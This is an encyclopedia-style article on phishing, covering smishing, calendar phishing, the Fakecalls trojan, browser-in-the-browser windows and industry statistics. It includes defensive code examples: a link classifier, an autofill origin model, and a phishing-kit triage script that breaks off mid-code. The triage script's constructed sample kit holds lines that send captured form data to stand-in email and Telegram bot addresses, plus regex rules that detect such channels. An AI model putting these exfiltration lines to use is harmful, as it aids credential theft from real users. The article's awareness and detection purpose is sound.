Phishing
A type of Internet fraud whose purpose is to gain access to sensitive user data (logins and passwords). The user believes he is going to the site named in the link, but is in fact redirected to a fake site. As a rule, customers of banks and payment systems become victims of phishers.
Hackers used emails to carry out this kind of attack, but with the widespread adoption of social networks and smartphones with Internet access, the types of phishing attacks began to multiply.
These emails contain a link that supposedly leads the user to the site of a company with a high level of confidentiality, although, in fact, such a site is just a simulation of the original site without any confidentiality.
Thus, a self-confident user who does not have reliable anti-virus protection can become a victim of an attack designed to steal personal data.
Phishing is one of the varieties of social engineering based on users' ignorance of the fundamentals of network security. In particular, many do not know a simple fact: services do not send letters asking for credentials, passwords, etc.
To protect against phishing, the makers of the major Internet browsers have agreed to use the same ways of informing users that they have opened a suspicious site that may belong to fraudsters. New versions of browsers already have this capability, which is accordingly called "anti-phishing."
Phishing Schemes
What feelings phishers play on
Most cybercriminals rely not only on technology, but also on human carelessness and gullibility. Back in 2011, a Cisco report listed seven human weaknesses exploited by criminals who use psychological methods to influence people through email, social networks, and telephone communications. We are talking about:
- sexuality,
- greed,
- vanity,
- excessive trust,
- laziness,
- compassion and
- haste in decisions made.
What a phishing email looks like:
Senders
- Executive authorities;
- Large telecommunications operators;
- Web-based forums;
- Credit and financial institutions;
- Partner Organizations;
- Customer organizations.
Contents
- Demand from executive authorities;
- Distribution of changes in regulations;
- Collection/repayment of debt/fine, payment of services;
- Search for documents to check.
At the beginning of 2017, experts drew attention to a new phishing campaign directed against Gmail users. The letters contain such well-disguised malicious links that even advanced users often do not notice the trick and enter their credentials on the phishing copy of Gmail. As soon as the victim is compromised, the attackers immediately take over access to the account and attack all of the victim's contacts.
Malicious emails coming from compromised users allegedly contain a PDF document that can be previewed directly from the web mail interface. However, by clicking on such an "attachment," which is actually a simple image embedded in the letter, the user is forwarded to the phishing page[1].
The phishing URL begins with "data:text/html,https://accounts/google.com", which may mislead the user into believing that he is still on the real Google website. In fact, a special script is used to open the phishing page in a new tab, and the page has nothing to do with Google.
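An added example, not taken from the campaign or its reporting: a link checker that parses the address the way a browser does, so that a "data:" URL with a Google-looking address inside it is reported with its real scheme and an empty host. It also covers two related cases beyond the one in the text (user-info before "@" and a trusted name used as a sub-label or path); the trusted-host list, the function names and all sample links except the quoted "data:" prefix are assumptions made for illustration.

```javascript
// Added example: decide where a link really leads by parsing it with the same
// WHATWG URL rules browsers use, instead of reading it by eye.
// TRUSTED_HOSTS and the sample links are constructed for illustration.
const TRUSTED_HOSTS = ["accounts.google.com"];

function classifyLink(href) {
  let url;
  try {
    url = new URL(String(href).trim());
  } catch {
    return { verdict: "invalid", scheme: null, host: null,
             reason: "not a parseable absolute URL" };
  }
  const scheme = url.protocol.slice(0, -1); // "https:" -> "https"
  const host = url.hostname;                // empty for data:, javascript:, ...
  const result = (verdict, reason) => ({ verdict, scheme, host, reason });

  // 1. Non-web schemes carry content or script, not the address of a site.
  if (scheme !== "https" && scheme !== "http") {
    const imitates = /https?:\/\//i.test(url.pathname);
    return result("suspicious", imitates
      ? `"${scheme}:" URL whose body contains a web address as plain text`
      : `"${scheme}:" is not a web address`);
  }
  // 2. Text before "@" is user info; the browser connects to what follows it.
  if (url.username !== "") {
    return result("suspicious", `user-info trick, real host is ${host}`);
  }
  // 3. A trusted name that is not the host itself (sub-label, path or query).
  if (!TRUSTED_HOSTS.includes(host)) {
    const rest = host + url.pathname + url.search;
    const borrowed = TRUSTED_HOSTS.find((name) => rest.includes(name));
    return borrowed
      ? result("suspicious", `mentions ${borrowed}, real host is ${host}`)
      : result("unknown", `host ${host} is not on the trusted list`);
  }
  // 4. Right host, but without TLS the page and its form can be altered in transit.
  if (scheme === "http") {
    return result("insecure", "trusted host requested over plain http");
  }
  return result("trusted", `https connection to ${host}`);
}

// Constructed samples; the first is the address-bar prefix quoted in the text.
const SAMPLE_LINKS = [
  "data:text/html,https://accounts/google.com",
  "https://accounts.google.com/signin",
  "https://accounts.google.com@login.example.net/",
  "https://accounts.google.com.login.example.net/signin",
  "http://accounts.google.com/",
];

function triage(links = SAMPLE_LINKS) {
  return links.map((link) => ({ link, ...classifyLink(link) }));
}

for (const row of triage()) {
  console.log(`${row.verdict.padEnd(10)} ${row.link}\n           ${row.reason}`);
}
```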
Compromising Email
Main article: E-mail fraud (business email compromise, SOUND, invoice fraud)
Compromise of corporate e-mail (business email compromise or invoice fraud) is a fraud in which the offender poses as a seller or business partner and convinces a representative of the company to transfer a large amount to an offshore account as "payment" for services that he never provided.
Calendar phishing
At the beginning of 2019, Kaspersky Lab experts recorded a wave of phishing attacks on users of the Google Calendar service. Throughout May, cybercriminals repeatedly sent fraudulent messages to victims, disguising them as automatic calendar notifications on a smartphone. This new way of conducting phishing attacks potentially gives attackers more opportunities, since in theory it can mislead even experienced users who are well aware of the threat of spam and phishing in email or instant messengers.
Messages sent by the attackers exploit the function that automatically adds an invitation to the calendar and notifies the user of the event. Many users have this feature enabled by default. If the victim opens the pop-up window on a smartphone, which looks very similar to a notification from a Google application, he will most likely see a link to a phishing site that allegedly runs a simple survey for a fee. To receive the cash prize, as it turns out later, the user needs to pay a small fee, and for this he must provide bank card data and some personal information, in particular name, phone number and address. Of course, all this goes directly to the attackers.
"This 'calendar phishing' is a very efficient scheme. Many users are already accustomed to spam messages in mail and instant messengers and often simply ignore and delete them. Everything is not so obvious in the calendar - because this application is created to organize information, and not to transmit it. So the probability that a fraudulent message in the calendar will be opened may be slightly higher," said Maria Vergelis, senior spam analyst at Kaspersky Lab. "So far, all samples of such phishing notifications discovered by us contain extremely strange offers, and this is immediately visible to any user. But each simple scheme becomes more complex and thoughtful over time. However, there is good news in this whole story: in order not to become a victim of such fraud, you do not need any special precautions and tricks - the automatic notification function can be easily turned off in the calendar settings."
"Google's terms of service and product policies prohibit the distribution of malicious content, and we work hard to prevent and prevent abuse. The fight against spam is an endless battle, and although we have made great progress, sometimes spam takes place. We remain deeply committed to protecting all our users from spam: we scan content in photos for spam and give users the opportunity to report spam in the calendar, Google Forms, on Google Drive, in Google Photos and in Hangouts. In addition, we offer users protection by warning them about known malicious URLs using Google Chrome secure browsing filters," the Google press service said.
Smishing (SMiShing)
For several years, hackers used a technique known as phishing. With its help, they sent emails to victims, allegedly from a bank, in an attempt to fraudulently obtain the login data for a bank account. Since people have become more aware of phishing letters, resulting in fewer phishing victims, hackers have changed their tactics and focused their attention on our phones.
Smishing is conceptually very similar: instead of sending emails, hackers began to send SMS text messages to their victims. Each of these messages is designed to deceive people in order to obtain extremely important personal information from them, for example, a PIN code for accessing their online bank. Some smishing messages direct their victims to a fake website or ask them to download a supposedly necessary application, which is actually infected with malware.
How to Recognize a Smishing Message
Almost every smishing message has one common feature: a sense of urgency. You will be told that your bank account has been hacked and you must urgently connect to it using the attached link. Or, as part of a routine security audit, your bank account has been blocked, so you need to confirm your password to restore access. You may even be asked to download a special application to improve the security of your account, and the sooner the better.
In fact, no bank sends urgent SMS messages: most of them use e-mail and regular letters to transmit important information. If you received a text message from your bank, it will not contain a link: at the very first opportunity you will simply be redirected to the page of the bank's website with the form for authorization or with the contact details of the bank's customer service.
Similarly, your bank will never send you a link to the site to download the new app. They can send you to the official App Store or Google Play, but most of them will send a pop-up notification through their official application, and not through text SMS.
If you have any (even the slightest) doubts about the text message you received, it is better to delete it. If the question is really very urgent, your bank will contact you again. You can also call them and get confirmation whether there is actually a problem with[2].
Phishing protection measures
Tips for Private Users
Checking the source of each e-mail you receive, and going to your bank's website not via a link from the letter but by typing the address in the address bar of your browser: these are the two main precautions you can take to avoid getting caught "on the fishing rod" of cyber criminals.
1. Learn to identify suspicious phishing emails
There are several features that identify the attack via email[3]:
- They duplicate the image of a famous company.
- They copy the name of the company or full name of the real employee of the company.
- They contain sites that are visually similar to the sites of real companies.
- They offer gifts or threaten the loss of an existing account.
2. Check the source of information
Your bank will never ask you to send your passwords or personal information by email. Never answer such requests, and if you have the slightest doubt, it is better to call your bank for clarification.
3. Never go to your bank's website by clicking on the links in the letters
Do not click on the links in the letter, as you may end up on a fake website.
It is better to manually type the site address in the address bar of your browser or use the previously configured bookmark in Favorites if you want to go faster.
4. Increase your PC's security
It is important to keep your common sense, and also to protect your computer with an antivirus that can block this type of attack.
In addition, you should always install the latest updates to your operating system and web browsers.
5. Enter your critical data only on secure websites
To find out if a website is "secure," check the address bar in your browser: the site address must begin with "https://", and a closed lock icon should appear next to it.
6. Check your accounts periodically
It never hurts to check your bank accounts periodically, so as not to miss any suspicious activity in your online transactions.
7. Phishing applies not only to online banks
Most phishing attacks are directed against banks, but they can use other popular websites to steal personal data: eBay, Facebook, PayPal and others.
8. Phishing knows all languages
Phishing knows no boundaries and can reach you in any language. In general, such messages are poorly written or translated, and this can serve as another indicator that something is wrong.
For example, if you have never been to the Spanish website of your bank, why should the information for you now be in this language?
9. If you have even the slightest doubt, do not take the risk
The best way to prevent phishing is not to respond to any email or news that asks you to provide sensitive data.
Delete these messages and call your bank to clarify your doubts.
10. Periodically read information about the development of malware
If you want to be aware of the latest malicious attacks, recommendations or tips to avoid any dangers on the Internet, you can read specialized blogs about cyber security on Facebook, VK, Twitter, etc.
Recommendations for organizations
In order not to become a victim of phishing, it is recommended that users always verify the authenticity of the website on which they intend to enter financial information, and check whether the connection is protected by the secure https protocol. In addition, you should not follow suspicious links or fulfill the requirements set out in emails sent on behalf of the bank if they cause even the slightest doubt - in this case, it is better to contact the financial institution directly. And, of course, it is necessary to use a protective solution that includes proactive phishing recognition and blocking functions.
What must be done to avoid danger:
- Regularly update your antivirus and browser.
- Hover over the link to see where it leads.
- Check your email for misspelled words, incorrect URLs, poor graphics, and unknown senders.
- Instead of clicking on the link in the letter, you should visit the website of the company that sent the letter to verify the reliability of the information.
What not to do:
- Do not click on links in letters received from unknown or suspicious sources.
- Don't send a suspicious email to friends or family.
- Don't download content that your browser or antivirus thinks is suspicious.
- Do not leave personal information on the site.
Training of company personnel
The project on increase process forming [4]
- Responsible, Timeline, Project Budget
- Training Program
- Material Development/Finished System Selection
We conduct training:
- Basic program for new employees
- Periodic mailings by topic
- One-off newsletters with important information about current threats
We check:
- Knowledge Assessment
- Testing in "combat" conditions
Awareness Systems Market
Imitation of the action of an attacker: phishing mailings for educational purposes
Threats associated with the use of social engineering will not go anywhere in the near future (but most likely will only grow)
- Such attacks are universal for penetration into any systems, easily replicated
- One "caught" is enough to compromise the entire network
- Do not rely solely on hardware
You can reduce risks by training employees and effectively testing their knowledge
- We supplement organizational measures with "combat exercises"
- Testing by conducting phishing newsletters can be supplemented by a simulation of other actions of intruders: telephone fraud, penetration tests
What is important is not what tools we use, but a well-organized training and testing process
- All of these solutions are just case studies
- If there are no processes, then there will be nothing to automate.
Phishing in Russia
Main article: Phishing in Russia
2022
Online banking malware intercepts support calls
Cybersecurity researchers from Kaspersky Lab described a banking trojan called Fakecalls. In addition to the usual spying functions, it has an interesting ability: to "talk" with the victim, imitating communication with a bank employee. This became known on April 12, 2022.
Fakecalls imitates the mobile applications of well-known Korean banks, including KB (Kookmin Bank) and KakaoBank. In addition to the usual logos, the creators of the trojan display on the Fakecalls screen the support service numbers of the respective banks. The phone numbers appear real (one of the numbers can be found on the home page of KakaoBank's official website).
During installation, the trojan requests a number of permissions, including access to contacts, microphone and camera, geolocation, call processing, etc.
Unlike other banking trojans, Fakecalls can simulate phone conversations with support. If the victim calls the bank hotline, the trojan quietly breaks the connection and opens its own fake call screen instead of the usual call application. While the user suspects nothing, the attackers take the situation into their own hands.
The only thing that can give the trojan away is the fake call screen. Fakecalls has only one interface language - Korean. This means that if another system language is selected on the phone, the victim is likely to sense that something is wrong.
After intercepting the call, two scenarios are possible. In the first, Fakecalls connects the victim directly with the cybercriminals, since the application has permission to make outgoing calls. In the second, the trojan plays a pre-recorded sound that imitates a standard bank greeting. The attackers recorded several phrases in Korean that are usually spoken by voicemail or call center employees. Fraudsters posing as a bank employee may try to extract payment data or other confidential information from the victim.
In addition to outgoing calls, Fakecalls can also spoof incoming calls. When attackers want to contact the victim, the trojan displays its screen on top of the system one. As a result, the user does not see the real number used by the attackers, but the one the malware shows, for example, the phone number of the bank support service.[5]
Browser-in-browser phishing attack
Among phishing attackers, the browser-in-the-browser (BitB) attack is gaining popularity; it creates a completely fake browser window, including trust icons. This became known from the company Informzaschita on April 07, 2022. This concept was previously used by hacker groups to steal login data. Information security researchers are concerned that the browser-in-the-browser attack will be actively applied in the field of advertising.
With the BitB technique, the browser window is simulated in order to fake a legitimate domain, which allows for plausible phishing attacks. This method uses the third-party single sign-on (SSO) options that are built into services such as Google Sign-In (the same system works with Facebook, Apple, or Microsoft). On the screen, it looks like a "Sign in with Microsoft" button, after which a pop-up window appears asking for the information needed to access your account or profile.
"Typically, the phishing window includes a closed lock icon and a (fake) resource URL, which leaves no doubt about the security of the authentication process. But if security policies are correctly configured in the browser and all anti-virus patches are up to date, it will be difficult for an attacker to insert an illegitimate page," explained the security analysis experts at Informzaschita.
At the same time, hackers often use methods such as clickjacking, or UI redressing, which changes the appearance of browsers and web pages in order to circumvent protection. With a clickjacking attack it is possible, for example, to place a transparent element over a button of the web page so that the user's action is intercepted by an attacker. BitB extends this technique by creating a completely fake browser window. The user thinks that he sees a real window, while in fact it is forged inside the page and is there to capture other people's credentials. A mixture of HTML and CSS code is used to simulate the browser window. The browser-in-browser attack is effective for phishing campaigns. Users still need to visit the malicious site for the pop-up window to appear, but after that they are most likely to enter their credentials in the form, because everything looks plausible.
The concept of BitB can be actively used by those who distribute viral advertising, according to Informzaschita. Malicious code can get through such ads in an iframe, but since the iframe is not protected, it can be embedded on the parent page in the form of a fake browser window. Development companies try to track malicious code. At the same time, information security experts believe that the BitB attack is unlikely to deceive other software.
Phishing tool that allows browser-in-browser attacks to steal logins and passwords
On March 23, 2022, it became known that a security expert with the nickname mr.dox had published on GitHub the code of a phishing tool that allows creating fake Chrome browser windows. Its purpose is to intercept access credentials for online resources.
As reported, when logging in to many sites, instead of registering with them directly, you can log in using accounts on social networks or with Google, Microsoft, Apple and even Steam. This option, for example, is offered by Dropbox.
When an attack occurs, a window pops up with a form for entering credentials. It may display a URL, but it cannot be changed. This string is used to verify the authenticity of the login form.
Hackers have repeatedly tried to use fake single sign-on login windows built with HTML, CSS and JavaScript; however, as a rule, these windows looked fake and could deceive only the most inexperienced users.
However, the attack called "browser-in-browser" makes it possible to display login windows that are indistinguishable from the real ones. It is enough for hackers (or pentesters) to edit only the URL and the window name (title field) in the templates prepared by mr.dox and create an iframe that will display this window.
The HTML code for the login form can be embedded directly into the template; however, as stated by mr.dox, the corresponding field will need to be positioned correctly using CSS and HTML. This, however, is unlikely to complicate the task greatly.
Information security expert Kuba Gretzky, creator of another phishing kit, Evilginx, confirmed that his tool is compatible with mr.dox's work; in combination, these two phishing kits can be used to intercept two-factor authentication keys.
"It will be extremely difficult to defend against such an attack. The developer himself indicates that it is aimed at pentesters, but it is obvious that in the near future it will be used in real attacks. The only precaution will be to know about the possibility of such attacks and to check three times where the user enters his access details. It is worth noting, however, that the technique will not work when using password autofill software, including that built into the browser: it will immediately determine that the window is fake," says Anastasia Melnikova, director of information security at SEQ.
The technique of such attacks is not new in itself, claims mr.dox. According to him, it was already used with varying success by the creators of fake sites for gamers to steal access details. And that was recent: these attacks date from 2020[6].
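The point about password autofill, as an added example that is not part of the article or of the published tool: a simplified model (an assumption, not any product's code) of a password manager that selects credentials by the real origin of the document holding the form and never by text painted inside the page. The saved login, the context fields and the example.net addresses are constructed for illustration.

```javascript
// Added example: origin-bound autofill, the check that a browser-in-browser
// window cannot satisfy. Simplified model; all data below is constructed.
const SAVED_LOGINS = new Map([
  ["https://accounts.google.com", { username: "user@example.com" }],
]);

// Origin as the browser computes it. Unparseable text and opaque origins
// (data: URLs, for instance, serialize as "null") can never own a saved login.
function originOf(urlText) {
  try {
    const origin = new URL(urlText).origin;
    return origin === "null" ? null : origin;
  } catch {
    return null;
  }
}

function autofillDecision(ctx) {
  // The login form lives in the iframe document if there is one, otherwise
  // in the top-level page.
  const formOrigin = originOf(ctx.frameUrl ?? ctx.topLevelUrl);
  const topOrigin = originOf(ctx.topLevelUrl);
  // Reported for the analyst only; the decision below never reads it.
  const painted = ctx.paintedAddressBar ? originOf(ctx.paintedAddressBar) : null;
  const paintedMismatch = painted !== null && painted !== formOrigin;
  const out = (fill, reason) => ({ fill, formOrigin, paintedMismatch, reason });

  if (formOrigin === null) {
    return out(false, "form document has no usable origin");
  }
  if (!formOrigin.startsWith("https://")) {
    return out(false, "form is not served over https");
  }
  if (!SAVED_LOGINS.has(formOrigin)) {
    return out(false, `no login saved for ${formOrigin}`);
  }
  // Strict policy chosen for this model: a real login form framed by another
  // site is refused too, so the embedding page gains nothing from it.
  if (topOrigin !== formOrigin) {
    return out(false, `form from ${formOrigin} is embedded by ${topOrigin}`);
  }
  return out(true, `origin matches saved login for ${formOrigin}`);
}

// Constructed page contexts.
const CONTEXTS = {
  genuinePopup: { topLevelUrl: "https://accounts.google.com/o/oauth2/auth" },
  fakeWindow: {
    topLevelUrl: "https://promo.example.net/offer",
    frameUrl: "https://promo.example.net/sso-window.html",
    paintedAddressBar: "https://accounts.google.com/o/oauth2/auth",
  },
  dataUrlPage: { topLevelUrl: "data:text/html,https://accounts/google.com" },
  framedRealForm: {
    topLevelUrl: "https://promo.example.net/offer",
    frameUrl: "https://accounts.google.com/signin",
  },
};

for (const [name, ctx] of Object.entries(CONTEXTS)) {
  const d = autofillDecision(ctx);
  console.log(`${name}: fill=${d.fill} paintedMismatch=${d.paintedMismatch} (${d.reason})`);
}
```

A manager that stays silent on a page showing a familiar address and lock icon is therefore a signal in itself: the painted address bar belongs to a different origin than the form.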
2021
Top 10 "phishing" topics
On January 11, 2022, Positive Technologies shared the top 10 "phishing" topics of 2021.
According to the company, the share of attacks on individuals using social engineering methods in the third quarter of 2021 increased to 83%, compared to 67% in the same quarter of 2020. Although most attack vectors remain relevant from year to year, attackers constantly improve their methods of deceiving victims and have successfully adapted to the conditions of the pandemic. In their attacks they increasingly exploit citizens' heightened interest in vaccination, delivery services, online dating, subscription services and even compensation for victims of fraud.
According to Positive Technologies, the top 10 topics of phishing attacks of 2021 cover the following areas:
- Continuation of the COVID-19 pandemic
  - The main topic in this area in 2021 was vaccination: fraudsters offered to buy fake QR codes and certificates, and also conducted fake surveys about vaccination of employees to collect data.
- Corporate mailings
  - The analysis showed that phishing mailing scenarios on wage changes, social package updates and banking costs are particularly successful.
- Premieres of TV shows and films
  - During high-profile premieres, fraudsters are more successful in stealing account and credit card data using fake sites that mimic popular streaming services.
- Sporting events
  - In 2021, attackers used the themes of the Tokyo Olympics and the European Football Championship, and have already begun to exploit the theme of the 2022 World Cup.
- Bank customers in the crosshairs
  - Under the guise of well-known brands, attackers lure users by promising bonuses, preferential loans or compensation to victims of fraud, as well as reporting "problems" with a mobile bank.
- Postal services
  - Fraudsters steal money and data, offering customers of such services to "pay" for delivery or duty, or simply to "check" the status of their package.
- Vacations and travel
  - Phishing letters and sites offer to book vacation places and tickets, luring people with lucrative promotions and discounts.
- Dangerous acquaintances
  - Attackers cynically exploit people's craving for communication during the mass transition to remote work and rob victims by arranging fake dates with them.
- Subscriptions to services
  - Scammers exploit popular subscription services, sending victims letters about taking out or renewing subscriptions to various platforms.
- Investments in cryptocurrency, oil and gas
  - Against the backdrop of the growing popularity of investment among individuals, cybercriminals create fake sites that mimic the resources of well-known companies, and even entire fake investment platforms.
"In 2022, we again expect to see a large number of phishing attacks united by the theme of significant events, including mass mailings on the theme of the World Cup or the Winter Olympic Games," said Ekaterina Kilyusheva, head of the research group of the information security analytics department of Positive Technologies. "There is also a high probability of attacks on users in connection with the release of new films and TV shows. In 2022, for example, it is planned to launch a series based on the works of J. R. R. Tolkien. And in connection with the release of the prototype digital ruble, attackers can create fake sites, offering to buy digital currency. We can expect the development of fraudulent schemes using social engineering in the field of investment. Here the victims will be private investors, to whom fraudsters will persistently offer their services under the guise of investors, authors of training courses and fake investment platforms."
Positive Technologies analysts also predict the further development and distribution of the Phishing-as-a-Service model. This model is based on the cooperation of attackers, the purchase and sale of ready-made solutions, such as fraudulent sites or malicious scripts.
To prevent serious consequences of phishing, experts recommend: always check the sender's address, do not follow suspicious links, and do not enter account and payment data without being convinced of the legitimacy of the resource. Booking hotels and tickets, as well as subscribing to services, should be done only on verified resources. To avoid malware infection, you need to check all received files. In an enterprise environment, sandboxes are recommended.
Due to fake draws, users lose $80 million per month
Every month, users around the world lose about $80 million due to fraudulent surveys and draws. Such data were cited in December 2021 by Group-IB, a company specializing in information security.
Scammers use the names of 120 popular brands to entice potential victims. People are offered as a gift a MacBook, Sony PlayStation 5, iPad Pro and flagship Apple and Samsung smartphones.
Most often, residents of Europe become victims of fraudsters - 36.2%, and targeted fraud is most common in India - 42.2% of cases of such fraud are registered in this country.
Most often, targeted fraud is found in the areas of telecommunications (56%), e-commerce (22.9%) and retail (11.9%), RBC reports.
According to Group-IB, if earlier fraudsters preferred to massively send spam and SMS messages to users, as well as write in instant messengers and by e-mail, now the approach is personalized. Thus, a unique targeted link is generated for a potential victim, which includes data on the country where the user lives, as well as on the time zone, language, IP address, browser type and other aspects.
To support phishing links, special domain networks are created, the largest of which contains 232 domains. This makes it possible to redirect traffic quickly when one of them is blocked and to ensure daily traffic to the fake surveys of 5 thousand users. Phishing of this type is a big threat to brands, says Andrei Busargin, Group-IB deputy director for Digital Risk Protection.
"If once a user lost money due to a 'brand,' then he is unlikely to return to it. There are also many unpredictable risks, for example, accounts are massively stolen on the site, and then money is washed through these accounts. If it comes to the proceedings, the company can get a strong blow to its reputation along with a fine from the regulatory authorities," he said.[7]
Tens of thousands of Iranians faced massive phishing attacks
On December 3, 2021, the Check Point Research (CPR) team from Check Point Software Technologies Ltd., a provider of cybersecurity solutions around the world, recorded large-scale malicious campaigns: phishing SMS attacks aimed at tens of thousands of devices of Iranian citizens. Messages allegedly sent by Iranian state services encourage victims to download malicious Android applications that steal accounts, personal data, credit cards, SMS messages and two-factor authentication codes. Attackers can also withdraw money from victims' cards and turn infected devices into bots, using them to spread malware to other devices. The Check Point Research team believes that the attackers' main motivation is financial.
According to CPR (Check Point Research), attackers infected tens of thousands of Android devices, which led to the theft of billions of Iranian rials (1000 rials are approximately 1.76 rubles).
Attackers use Telegram channels to distribute malicious tools, which cost only $50 (about 3,700 rubles).
According to a CPR (Check Point Research) study, data stolen from victims' devices were not protected, so they were freely available online.
Attackers use compromised devices as bots to send similar phishing SMS messages to other potential victims. To promote and sell their tools, cybercriminals use several Telegram channels. For 50-150 US dollars (approximately 3,700-11,100 rubles), fraudsters provide a complete "Android Campaign Kit," which contains a malicious application and a basic infrastructure with a control panel that can be easily managed through a Telegram bot without any specialized skills.
The CPR (Check Point Research) investigation comes at the height of major cyber attacks targeting Iranian residents, including attacks on railways, gas stations and more.
According to CPR estimates, attackers compromised tens of thousands of Android devices and installed malware on them. As a result, they were able to steal billions of Iranian rials. It is estimated that each victim lost between $1,000 and $2,000 (between 74,600 and 148,000 rubles). In addition, the CPR investigation showed that the data stolen from the victims' devices was not protected, so it was publicly accessible online.
Figure 1. Infection chain
"Cyber attacks significantly affect the daily life of Iranians. At first it was railways: we tracked that they were organized by the Indra cyber group. Then there were cyber attacks on gas station systems and airlines. Now we are seeing another attack that shows how cybercrime can lead to chaos. We do not see a direct connection between the latest cyber attacks and other aforementioned ones, but our studies show that even the simplest, not large-scale cyber attacks cause serious damage to the population of Iran," said Alexandra Hoffmann, head of the threat analysis group of Check Point Software. "We believe that these recent cyber attacks are financially motivated - and that the people involved in these attacks are themselves from Iran.
"The speed and spread of these cyber attacks is unrelenting. This campaign was aimed at a huge number of people. Cybercriminals were able to cause serious damage to their victims, even though the quality and technical simplicity of the tools were poor. There are several reasons for their success. Firstly, well-chosen methods of social engineering, imitating official messages from public services: people wanted to study the details by clicking on the link from the message. Secondly, technical techniques when each infected device sends additional phishing SMS messages - the attacks were able to spread very quickly to a large number of potential victims. It was these campaigns that were used in Iran, but in general they can be used in any other part of the world. I believe it is important to raise awareness of the schemes used by attackers."
Six out of ten users fall for phishing
On October 13, 2021, the international developer of antivirus solutions ESET shared the results of a test of users' ability to distinguish a phishing message from a regular letter. The experiment involved 4,292 people in different age groups. Each user was sent four emails, malicious and safe. As a result, 60% of participants could not correctly identify fraudulent letters.
The test showed that young users were much more likely to distinguish real messages from fake ones: 47% in the age group from 18 to 24 years old understood which letter should not be opened. In the age group from 25 to 44 years old, the indicators are similar: 45%. Users from 45 to 64 years old were mistaken more often and were able to identify a fake in 36% of cases. In the group over 65 years old, only 28% of the participants saw through the fraudsters' scheme.
"Phishing has existed for a very long time, but attackers do not stop improving their skills in forging letters from well-known brands and official government agencies. According to ESET analysts, phishing campaign tactics are aimed at home office employees. The structure of consumption at remote work has changed, and this created the conditions for a more successful application of phishing," commented Tony Anscombe, ESET chief security specialist.
According to the ESET threat telemetry, the leaders in the daily blocking of phishing sites in the world are Russia, Japan, Peru, Poland and France. At the same time, sources of malicious mailings are most often detected in North America and Western Europe.
Ukrainian police neutralized one of the world's largest phishing services
Employees of the Office of the Prosecutor General, together with employees of the Department of Cyber Police of the National Police of Ukraine and the Main Investigative Directorate of the National Police, as well as law enforcement agencies of the USA and Australia, conducted a special operation that neutralized the activity of one of the world's largest phishing services, used to carry out attacks on financial institutions of different countries[8][9][10].
According to the investigation, a hacker from the Ternopil region developed a phishing package and a special administrative panel for it, which were aimed at the web resources of banks and their customers. The administrative panel made it possible to control the accounts of users who registered with compromised resources and entered their payment data. To demonstrate the functionality and sell his developments, the attacker created his own online store in the darknet.
As a result of phishing attacks, financial institutions in Australia, Spain, the USA, Italy, Chile, the Netherlands, Mexico, France, Switzerland, Germany and the UK suffered. According to preliminary data, losses reach tens of millions of dollars. For example, more than 50% of all phishing attacks in Australia in 2019 were carried out using the software developed by the Ternopil hacker.
During the search, law enforcement officers seized computer equipment, mobile phones and hard drives. During the inspection of the seized computer equipment, more than 200 active buyers of the malware were identified. According to preliminary data, the hacker not only sold his products to customers around the world, but also provided technical support for phishing attacks. The question of serving the suspect with a notice of suspicion is now being decided.
2020
Cybercriminals use Telegram bots and Google forms to automate phishing
On April 7, 2021, it became known that Group-IB, an international company specializing in the prevention of cyber attacks, discovered that user data stolen in phishing attacks is increasingly exfiltrated not only by e-mail, but also through legitimate services such as Google Forms and the Telegram messenger. Alternative methods of delivering stolen data allow attackers to keep that data safe and put it to use quickly. Telegram bots are also used by cybercriminals in ready-made phishing automation platforms available on the darknet: these implement an administrative part based on bots, through which the entire phishing attack is controlled and the stolen money is recorded. Such platforms are distributed in the cybercrime-as-a-service format, which is increasing the number of attacking groups and the scale of the criminal business.
As explained, the CERT-GIB team (Group-IB Information Security Incident Monitoring and Response Center) analyzed the tools for creating phishing pages, so-called phishing kits, and found that in 2020 they were most often used to create phishing sites for various online services (online shopping, online cinemas, etc.), financial organizations, as well as e-mail. In total, Group-IB discovered phishing kits aimed at more than 260 unique brands in Russia and abroad.
A phishing kit is a set of ready-made tools for creating and launching phishing web pages that imitate a particular company's website, or several at once. As a rule, phishing kits are sold in the darknet, in specialized forums. With them, criminals who do not have deep programming skills can deploy infrastructure for large-scale phishing attacks and quickly resume its work if blocked. Phishing kits are interesting to cybersecurity researchers primarily because analyzing one such "set" makes it possible to understand the mechanism of a phishing attack and establish where stolen data is sent. In addition, research on phishing kits often helps to detect digital traces leading to the developers of such a "product."
As in 2019, the main target of phishers was online services (30.7%): by stealing the credentials of user accounts, attackers gained access to the data of linked bank cards. The attractiveness of e-mail services for attacks decreased in 2020, and the share of phishing kits aimed at them fell to 22.8%. Financial institutions round out the top three, accounting for slightly more than 20%. In 2020, the most commonly used brands in phishing kits were Microsoft, PayPal, Google and Yahoo.
The attacker does not immediately receive the data that the user enters on the phishing site: it is first written to a local file, after which the main task is to retrieve the stolen data. Most often, addresses registered on free e-mail services are used to forward such data. They make up 66% of the total number of addresses found in phishing kits. The most common accounts are on Gmail and Yandex.
Alternative ways of obtaining stolen data can be divided into local ones, when the data is written to a file located on the phishing resource itself, and remote ones, when it is sent to a third-party server. To transfer stolen data, attackers actively use legitimate services. In 2020, phishing kits began to make widespread use of Google Forms, as well as of uploading stolen data to specially created private Telegram bots. In total, alternative methods still account for about 6%, but their share will most likely grow, with Telegram accounting for most of the increase because the scheme is simple to implement and the messenger is anonymous.
The functionality of phishing kits is not limited to creating pages for stealing user data: some of them can upload malicious files to the victim's device. Sometimes sellers of phishing kits deceive their own customers by trying to earn money on them twice. In addition to selling the malicious tool they created, they may also be interested in the data stolen using it. Using a special script built into the body of a phishing kit, they direct the flow of stolen user data to themselves or gain hidden access to their buyer's hosting.
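The kind of kit triage described above (establishing where stolen data is sent, and spotting a second recipient hidden by the kit's seller) can be sketched as follows. This is an added example, not Group-IB's tooling; the sample files, addresses, the `<TOKEN>` placeholder and all function names are constructed for illustration.

```python
import base64
import re

# Constructed sample: file contents shaped like an unpacked phishing kit.
# Every address, file name and the <TOKEN> placeholder is invented.
_HIDDEN = base64.b64encode(b"seller@example.net").decode()
SAMPLE_KIT = {
    "login/post.php": (
        '$to = "collector@example.com";\n'
        'mail($to, "new entry", $body);\n'
        'file_put_contents("entries.txt", $body, FILE_APPEND);\n'
    ),
    "login/notify.php": '$api = "https://api.telegram.org/bot<TOKEN>/sendMessage";\n',
    "assets/cfg.php": f'$k = base64_decode("{_HIDDEN}");\nmail($k, "copy", $body);\n',
    "index.html": '<form action="login/post.php" method="post"></form>\n',
}

# One rule per delivery channel named in the article.
CHANNEL_RULES = {
    "email": re.compile(r"\bmail\s*\("),
    "local_file": re.compile(r"\b(?:fwrite|fputs|file_put_contents)\s*\("),
    "telegram_bot": re.compile(r"api\.telegram\.org/bot", re.I),
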